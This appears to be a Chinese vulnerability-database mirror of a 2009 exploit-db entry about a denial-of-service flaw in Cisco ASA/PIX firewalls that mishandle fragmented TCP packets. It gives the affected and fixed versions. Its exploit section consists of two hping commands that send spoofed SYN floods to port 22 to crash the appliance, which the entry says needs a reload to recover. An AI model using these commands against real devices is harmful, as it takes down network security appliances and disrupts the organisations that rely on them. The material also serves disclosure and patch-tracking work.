Cisco ASA/PIX - Appliances Fail to Properly Check Fragmented TCP Packets

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057656 漏洞类型
发布时间 2009-04-10 更新时间 2009-04-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8393
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
The vulnerability affects the following Cisco ASA/PIX versions:

Release     Fixed in:
--------     ---------
6.3        Not affected
7.0        7.0(8.6)   
7.1        7.1(2.81)   
7.2        7.2(4.30)   
8.0        8.0(4.28)   
8.1        8.1(2.19)   
8.2        8.2(0.230)

-----------------------------
Triggering the vuln
------------------------------

/*Utilize  1550 blocks on an ASA to trigger a crash...*/
hping --fast -p 22 -w 1518 -S -d 1480 -a 10.22.1.1 10.22.1.2

/* Trigger the vuln a bit faster */
hping --fast -p 22 -w 1518 -S -d 26201 .a 10.22.1.1 10.22.1.2

Reloading the device is the only way to recover from the denial of service.

| Daniel Uriah Clemens
"Moments of sorrow are moments of sobriety" 

# milw0rm.com [2009-04-10]